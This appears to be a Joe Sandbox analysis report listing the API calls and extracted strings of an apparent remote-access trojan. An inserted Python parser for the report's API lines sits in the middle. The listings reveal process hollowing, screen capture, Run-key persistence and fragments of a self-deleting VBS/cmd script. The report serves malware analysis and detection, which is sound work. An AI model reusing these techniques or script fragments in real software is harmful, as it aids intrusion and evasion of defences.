                                • Instruction Fuzzy Hash: 1002BFB17146519BC318CF2EEC8053AB7E1BB8D301745863EE495C7795EB34E922CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: PkGNG
                                • API String ID: 0-263838557
                                • Opcode ID: 5962e5082cf13a8249de797b5eebe59d3637d4add307bccac64aa69d81196930
                                • Instruction ID: 4a18c9c21abf6ab3d0e9afb34562907cd60dbb70f6b305f111ae620774dcdf5c
                                • Opcode Fuzzy Hash: 5962e5082cf13a8249de797b5eebe59d3637d4add307bccac64aa69d81196930
                                • Instruction Fuzzy Hash: 42F18C716142559FC304DF1EE89182BB3E1FB89301B450A2EF5C2C7391DB79EA16CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free$InfoLocale_abort
                                • String ID:
                                • API String ID: 1663032902-0
                                • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$InfoLocale_abort_free
                                • String ID:
                                • API String ID: 2692324296-0
                                • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(?,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                • String ID:
                                • API String ID: 1272433827-0
                                • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID:
                                • API String ID: 1084509184-0
                                • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.4 Pro), ref: 0040F8E5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID:
                                • API String ID: 2299586839-0
                                • Opcode ID: 2888965568e38a2ba7a5abe7093904758464576a93ba76aee1c710f175ee0f35
                                • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                • Opcode Fuzzy Hash: 2888965568e38a2ba7a5abe7093904758464576a93ba76aee1c710f175ee0f35
                                • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                Uniqueness

                                Uniqueness Score: -1.00%
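The function entries on this page all share one line layout for their "APIs" column: a bullet, an optional "Part of subcall function <addr>:" prefix, then "<Api>.<MODULE>(<args>), ref: <call-site address>", with the argument list omitted for some CRT calls. The parser below is an added example and not Joe Sandbox code; it turns those lines into records so that an analyst can count which APIs a function calls directly versus through a helper, and locate entries whose resolved arguments contain a string of interest (here the "4.9.4 Pro" literal that appears in the GetLocaleInfoA entry above). SAMPLE is a constructed excerpt copied from entries on this page; everything else, including the assumption that the argument column is comma-separated and contains no nested commas, is the example's own.

```python
"""Parse the 'APIs' lines of a Joe Sandbox function listing.

Added example; this is not code from Joe Sandbox. It assumes only the
line layout visible on this page:
  - <Api>.<MODULE>(<arg>,<arg>,...), ref: <hex call-site address>
  - <Api>.<MODULE> ref: <hex call-site address>          (no argument list)
  - Part of subcall function <hex>: <either form above>
and that resolved arguments never contain a comma (an assumption).
SAMPLE below is a constructed excerpt copied from entries on this page.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

API_LINE = re.compile(
    r"^\s*[•*-]\s*"
    r"(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

SAMPLE = """\
APIs
  • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
• EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
Memory Dump Source
• Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
• HeapFree.KERNEL32(00000000), ref: 004120EE
APIs
• GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.4 Pro), ref: 0040F8E5
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
"""


@dataclass(frozen=True)
class ApiCall:
    api: str                # e.g. GetLocaleInfoA
    module: str             # e.g. KERNEL32, or LIBCMT for the statically linked CRT
    args: tuple             # argument column as listed; '?' means the sandbox could not resolve it
    ref: int                # address of the call site
    subcall: Optional[int]  # callee address when the line is "Part of subcall function", else None


def parse_api_lines(text: str) -> list:
    """Return one ApiCall per matching line, in page order; non-API lines are ignored."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        sub = m.group("subcall")
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("module"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall=int(sub, 16) if sub else None,
        ))
    return calls


def api_histogram(calls, include_subcalls: bool = True) -> Counter:
    """Count 'Api.MODULE' names; with include_subcalls=False only direct calls are counted."""
    return Counter(
        f"{c.api}.{c.module}" for c in calls
        if include_subcalls or c.subcall is None
    )


def find_arg(calls, needle: str) -> list:
    """Entries whose argument column contains the literal, e.g. a string the report resolved."""
    return [c for c in calls if any(needle in a for a in c.args)]


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for name, n in api_histogram(parsed, include_subcalls=False).most_common():
        print(f"{n:3d}  {name}")
    for c in find_arg(parsed, "4.9.4 Pro"):
        print(f"'4.9.4 Pro' referenced by {c.api} at {c.ref:08X}")
```

Direct calls and "Part of subcall function" calls are kept apart on purpose: the subcall lines are repeated under every function that reaches the same helper (the 00448215 error-handling routine appears under several entries above), so counting them together would inflate the histogram.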

                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                • Instruction Fuzzy Hash:
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                • Instruction ID: cdd912994a32e16cda9accbda93f1ea0618352901e275441ec4d65c4c105c2b3
                                • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                • Instruction Fuzzy Hash: 9C514771603648A7DF3489AB88567BF63899B0E344F18394BD882C73C3C62DED02975E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                  • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                • DeleteDC.GDI32(00000000), ref: 00418F2A
                                • DeleteDC.GDI32(00000000), ref: 00418F2D
                                • DeleteObject.GDI32(00000000), ref: 00418F30
                                • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                • DeleteDC.GDI32(00000000), ref: 00418F62
                                • DeleteDC.GDI32(00000000), ref: 00418F65
                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                • GetCursorInfo.USER32(?), ref: 00418FA7
                                • GetIconInfo.USER32(?,?), ref: 00418FBD
                                • DeleteObject.GDI32(?), ref: 00418FEC
                                • DeleteObject.GDI32(?), ref: 00418FF9
                                • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                • DeleteDC.GDI32(?), ref: 0041917C
                                • DeleteDC.GDI32(00000000), ref: 0041917F
                                • DeleteObject.GDI32(00000000), ref: 00419182
                                • GlobalFree.KERNEL32(?), ref: 0041918D
                                • DeleteObject.GDI32(00000000), ref: 00419241
                                • GlobalFree.KERNEL32(?), ref: 00419248
                                • DeleteDC.GDI32(?), ref: 00419258
                                • DeleteDC.GDI32(00000000), ref: 00419263
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                • String ID: DISPLAY
                                • API String ID: 4256916514-865373369
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                  • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                  • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                • ExitProcess.KERNEL32 ref: 0040D7D0
                                Strings
                                Yara matches
                                Similarity
                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hdF$hpF$open$wend$while fso.FileExists("
                                • API String ID: 1861856835-2780701618
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                • ResumeThread.KERNEL32(?), ref: 00418435
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                • GetLastError.KERNEL32 ref: 0041847A
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                  • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                • ExitProcess.KERNEL32 ref: 0040D419
                                Similarity
                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hdF$hpF$open$pth_unenc$wend$while fso.FileExists("$Mw
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,(x,00000003), ref: 00412494
                                • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                • GetCurrentProcessId.KERNEL32 ref: 00412541
                                • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                  • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                • Sleep.KERNEL32(000001F4), ref: 00412682
                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                Similarity
                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                • String ID: (x$.exe$8SG$WDH$exepath$open$temp_
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                • SetEvent.KERNEL32 ref: 0041B219
                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                • CloseHandle.KERNEL32 ref: 0041B23A
                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                Similarity
                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                Uniqueness

                                Uniqueness Score: -1.00%

